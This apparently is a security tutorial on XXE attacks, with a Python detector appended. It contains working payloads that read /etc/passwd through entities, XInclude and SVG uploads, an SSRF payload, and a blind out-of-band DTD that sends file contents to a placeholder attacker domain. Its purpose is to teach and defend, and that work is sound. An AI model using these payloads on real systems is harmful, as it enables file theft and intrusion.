XXE

Introduction

XML External Entity (XXE) processing is an attack that allows an attacker to interfere with an application's processing of XML data. The submitted XML contains a reference to an external entity (a local file or an external URL) that the XML parser resolves, which can lead to information disclosure, server-side request forgery and port scanning.

Proof of Concept

The following examples retrieve the file /etc/passwd from the victim system and return its content inside the "name" element.

<!-- EXAMPLE 1 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY output SYSTEM "file:///etc/passwd" >]>
<comment>
  <name>&output;</name>
</comment>

<!-- EXAMPLE 2 -->
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name><foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo></name>
</comment>

Furthermore, it can also be used to perform SSRF attacks:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY output SYSTEM "https://localhost/" >]>
<comment>
  <name>&output;</name>
</comment>

Finally, if the application allows SVG images to be uploaded, the attack surface grows: SVG is itself XML, so the image processing library may parse the entity declarations embedded in the image.

Once the image is shown to the client, it will contain the retrieved information.

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Blind XXE (Data out-of-band)

In a blind XXE attack, the attacker cannot see the result of their injection and must rely on indirect methods to gather information or execute their payload.

To perform this attack, the attacker first hosts a malicious Document Type Definition (DTD) on a machine they control and then invokes that malicious DTD from the DTD submitted to the victim's website.

This is an example of retrieving the file /etc/passwd from the victim's website.

<!-- HOSTED MALICIOUS DTD (malicious.dtd) -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<ATTACKER_DOMAIN>/?x=%file;'>">
%eval;
%exfiltrate;

<!-- SUBMITTED DTD -->
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://<ATTACKER_DOMAIN>/malicious.dtd"> %xxe;]>

Blind XXE (Error message)

Another way to retrieve data through an XXE vulnerability is to trigger an XML parsing error. This only works if the application shows the resulting error message in its response, because that error message is what carries the sensitive data.

The payload, hosted as an external DTD and invoked in the same way as the previous one, would be:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
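As an added example (not part of the original guide), the following Python pre-parse gate, built on the standard library's expat bindings, flags the constructs every payload above depends on: DOCTYPE declarations, SYSTEM entities, parameter entities and XInclude elements. expat performs no I/O of its own, so the inspection never resolves anything; the sample documents are constructed copies of the payload shapes, with `dtd-host.example` as a placeholder for the attacker-controlled host.

```python
import xml.parsers.expat as expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def xxe_findings(document: bytes) -> list[str]:
    """Pre-parse gate: list every DTD/XInclude construct that would let a real
    parser reach the file system or network. expat does no I/O, so nothing is fetched."""
    findings: list[str] = []
    parser = expat.ParserCreate(namespace_separator=" ")  # names arrive as "<uri> <local>"
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"DOCTYPE for <{name}>")
        if sysid:  # <!DOCTYPE x SYSTEM "..."> points at a remote DTD
            findings.append(f"external DTD {sysid}")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        ref = f"%{name};" if is_param else f"&{name};"
        if sysid:  # SYSTEM identifier: a file:// or http:// fetch on expansion
            findings.append(f"external entity {ref} -> {sysid}")
        elif is_param or (value and "<!ENTITY" in value):
            findings.append(f"suspicious internal entity {ref}")  # blind-XXE building block

    def on_start(name, attrs):
        if name.startswith(XINCLUDE_NS + " "):
            findings.append(f"XInclude href={attrs.get('href')}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    try:
        parser.Parse(document, True)
    except expat.ExpatError as exc:
        findings.append(f"malformed XML: {exc}")
    return findings


# Constructed samples modelled on the payload shapes above; dtd-host.example
# stands in for the attacker-controlled host.
SAMPLES = {
    "file_entity": b'<?xml version="1.0"?><!DOCTYPE data [<!ELEMENT data ANY>'
                   b'<!ENTITY output SYSTEM "file:///etc/passwd">]>'
                   b'<comment><name>&output;</name></comment>',
    "xinclude": b'<comment><name><foo xmlns:xi="http://www.w3.org/2001/XInclude">'
                b'<xi:include parse="text" href="file:///etc/passwd"/></foo></name></comment>',
    "blind_dtd": b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM '
                 b'"http://dtd-host.example/malicious.dtd"> %xxe;]><foo/>',
    "benign": b'<comment><name>alice</name></comment>',
}
```

A non-empty result is a reason to reject the document before it reaches the application's real parser; an application that never needs a DTD can simply refuse anything that reports a DOCTYPE.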
